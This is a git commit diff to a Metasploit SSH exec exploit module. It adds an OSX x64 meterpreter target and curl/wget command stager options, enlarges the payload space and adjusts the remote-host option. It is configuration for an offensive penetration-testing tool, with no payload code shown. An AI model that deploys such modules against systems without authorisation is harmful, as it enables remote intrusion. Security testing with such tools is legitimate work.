First swing at osx x64 meterpreter support

bwatters-r7 · bwatters-r7 · commit 3b2a0be20043 · 2017-11-30T14:47:46.000-06:00
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
@@ -35,11 +35,12 @@ def initialize
         },
       'Payload'          =>
         {
-          'Space'        => 4096,
+          'Space'        => 800000,
           'BadChars'     => "",
           'DisableNops'  => true
         },
       'Platform'         => %w{ linux osx python },
+      'CmdStagerFlavor'  => %w{ bourne echo printf curl wget },
       'Targets'          =>
         [
           [ 'Linux x86',
@@ -60,14 +61,20 @@ def initialize
               'Platform' => 'osx'
             }
           ],
+          [ 'OSX x64',
+            {
+              'Arch'     => ARCH_X64,
+              'Platform' => 'osx',
+              'CmdStagerFlavor'  => %w{curl wget}
+            }
+          ],
           [ 'Python',
             {
               'Arch'     => ARCH_PYTHON,
               'Platform' => 'python'
             }
           ]
         ],
-      'CmdStagerFlavor'  => %w{ bourne echo printf },
       'DefaultTarget'    => 0,
       # For the CVE
       'DisclosureDate'   => 'Jan 01 1999'
@@ -77,7 +84,7 @@ def initialize
       [
         OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
         OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
-        OptString.new('RHOST', [ true, "The target address" ]),
+        Opt::RHOST('RHOST', [ true, "The target address" ]),
         Opt::RPORT(22)
       ], self.class
     )

Original file line number	Diff line number	Diff line change
`@@ -35,11 +35,12 @@ def initialize`
`35`	`35`	`},`
`36`	`36`	`'Payload' =>`
`37`	`37`	`{`
`38`		`- 'Space' => 4096,`
	`38`	`+ 'Space' => 800000,`
`39`	`39`	`'BadChars' => "",`
`40`	`40`	`'DisableNops' => true`
`41`	`41`	`},`
`42`	`42`	`'Platform' => %w{ linux osx python },`
	`43`	`+ 'CmdStagerFlavor' => %w{ bourne echo printf curl wget },`
`43`	`44`	`'Targets' =>`
`44`	`45`	`[`
`45`	`46`	`[ 'Linux x86',`
`@@ -60,14 +61,20 @@ def initialize`
`60`	`61`	`'Platform' => 'osx'`
`61`	`62`	`}`
`62`	`63`	`],`
	`64`	`+ [ 'OSX x64',`
	`65`	`+ {`
	`66`	`+ 'Arch' => ARCH_X64,`
	`67`	`+ 'Platform' => 'osx',`
	`68`	`+ 'CmdStagerFlavor' => %w{curl wget}`
	`69`	`+ }`
	`70`	`+ ],`
`63`	`71`	`[ 'Python',`
`64`	`72`	`{`
`65`	`73`	`'Arch' => ARCH_PYTHON,`
`66`	`74`	`'Platform' => 'python'`
`67`	`75`	`}`
`68`	`76`	`]`
`69`	`77`	`],`
`70`		`- 'CmdStagerFlavor' => %w{ bourne echo printf },`
`71`	`78`	`'DefaultTarget' => 0,`
`72`	`79`	`# For the CVE`
`73`	`80`	`'DisclosureDate' => 'Jan 01 1999'`
`@@ -77,7 +84,7 @@ def initialize`
`77`	`84`	`[`
`78`	`85`	`OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),`
`79`	`86`	`OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),`
`80`		`- OptString.new('RHOST', [ true, "The target address" ]),`
	`87`	`+ Opt::RHOST('RHOST', [ true, "The target address" ]),`
`81`	`88`	`Opt::RPORT(22)`
`82`	`89`	`], self.class`
`83`	`90`	`)`